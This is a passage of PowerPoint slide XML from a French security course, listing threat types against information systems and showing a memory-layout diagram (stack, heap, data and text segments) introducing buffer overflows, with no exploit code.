              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Exemples : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" b="1" dirty="0"/>
              <a:t>L’espionnage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0"/>
              <a:t> : Obtention d’informations </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" b="1" dirty="0"/>
              <a:t>Le vol </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0"/>
              <a:t>: Obtention d’informations ou de ressources </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" b="1" dirty="0"/>
              <a:t>La perturbation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0"/>
              <a:t>: Affaiblir le S.I. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" b="1" dirty="0"/>
              <a:t>Le sabotage : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0"/>
              <a:t>Mise hors service du S.I. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" b="1" dirty="0"/>
              <a:t>La fraude physique </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0"/>
              <a:t>(récupération de bandes, listings, …) : Obtention d’informations </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" b="1" dirty="0"/>
              <a:t>Les accès illégitimes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>(usurpation d’identité) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>: Obtention d’informations </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1900"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6</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31099086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attaques applicatives</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="657546"/>
            <a:ext cx="9805416" cy="6032813"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buffer overflow : Structure de la mémoire</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8610600" y="6284432"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6951A42B-171D-4B94-AECE-9A114FAB7514}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2175426" y="1622341"/>
            <a:ext cx="2780523" cy="2248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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2418605" y="2535186"/>
            <a:ext cx="587829" cy="4105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smtClean="0"/>
              <a:t>PC</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3249612" y="1942691"/>
            <a:ext cx="1389095" cy="6686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smtClean="0"/>
              <a:t>Registres</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3249613" y="2959728"/>
            <a:ext cx="1389095" cy="6686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smtClean="0"/>
              <a:t>Registre de condition</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="ZoneTexte 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2247153" y="1622341"/>
            <a:ext cx="685217" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>CPU</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="ZoneTexte 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7328052" y="1336069"/>
            <a:ext cx="1056401" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Mémoire</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="20" name="Espace réservé du contenu 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2525816770"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7100970" y="1622341"/>
          <a:ext cx="1576872" cy="4971373"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1576872"/>
              </a:tblGrid>
              <a:tr h="489221">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnT w="12700" cmpd="sng">
                      <a:noFill/>
                    </a:lnT>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="648000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Stack</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="871312">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="648000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>Heap</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="648000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>BSS segment</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="648000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Data segment</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="648000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>Text</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t> segment</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnB w="12700" cmpd="sng">
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Connecteur droit avec flèche 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4955949" y="2154186"/>
            <a:ext cx="205171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Connecteur droit avec flèche 21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4955948" y="2740459"/>
            <a:ext cx="2051715"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p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4955948" y="3415373"/>
            <a:ext cx="205171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ZoneTexte 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5469715" y="1758025"/>
            <a:ext cx="1537948" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Adresses (1)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="ZoneTexte 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5469715" y="2316700"/>
            <a:ext cx="1537948" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Données (2)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="ZoneTexte 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5373129" y="2971125"/>
            <a:ext cx="1634534" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Instructions (3)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Connecteur droit 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8767294" y="2108236"/>
            <a:ext cx="326470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8767292" y="2740459"/>
            <a:ext cx="326470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8767290" y="3628423"/>
            <a:ext cx="326470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8767290" y="6206070"/>
            <a:ext cx="326470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8767290" y="4907358"/>
            <a:ext cx="326470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8767291" y="5563340"/>
            <a:ext cx="326470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8767291" y="4281286"/>
            <a:ext cx="326470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8767290" y="2185838"/>
            <a:ext cx="2429820" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Variable locale</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Contexte de procédure</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="ZoneTexte 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8677842" y="3796337"/>
            <a:ext cx="2429820" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Variable allouée par </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t> …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="ZoneTexte 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8767290" y="4337954"/>
            <a:ext cx="2429820" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>les variables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0" err="1"/>
              <a:t>static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0"/>
              <a:t>/global</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0"/>
              <a:t>non initialisées</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="ZoneTexte 36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8767290" y="5005713"/>
            <a:ext cx="2429820" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0" smtClean="0"/>
              <a:t>Les variables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>/global</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t> qui sont </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>initialisées</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="ZoneTexte 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8767290" y="5730817"/>
            <a:ext cx="2429820" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>le code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>machine exécutable </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="39" name="Connecteur droit avec flèche 38"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7867505" y="2760337"/>
            <a:ext cx="0" cy="3600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Connecteur droit avec flèche 39"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7865848" y="3260230"/>
            <a:ext cx="0" cy="3600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41" name="Groupe 40"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8516384" y="1345342"/>
            <a:ext cx="2240171" cy="523828"/>
            <a:chOff x="6751506" y="749368"/>
            <a:chExt cx="1765018" cy="523828"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="ZoneTexte 41"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7350198" y="749976"/>
              <a:ext cx="1166326" cy="523220"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0"/>
                <a:t>Adresse haute</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="ZoneTexte 42"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6751506" y="749368"/>
              <a:ext cx="1166326" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0"/>
                <a:t>0xFFF…FF</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="44" name="Groupe 43"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8521974" y="6579297"/>
            <a:ext cx="2471374" cy="524924"/>
            <a:chOff x="6757096" y="5983323"/>
            <a:chExt cx="1804166" cy="524924"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="ZoneTexte 44"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6757096" y="5983323"/>
              <a:ext cx="1166326" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0"/>
                <a:t>0x000…00</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="ZoneTexte 45"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7394936" y="5985027"/>
              <a:ext cx="1166326" cy="523220"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0"/>
                <a:t>Adresse basse</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Rectangle 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="3912628"/>
            <a:ext cx="6096000" cy="28589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nSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> x = 100; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>// variable globale: dans le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:solidFill>
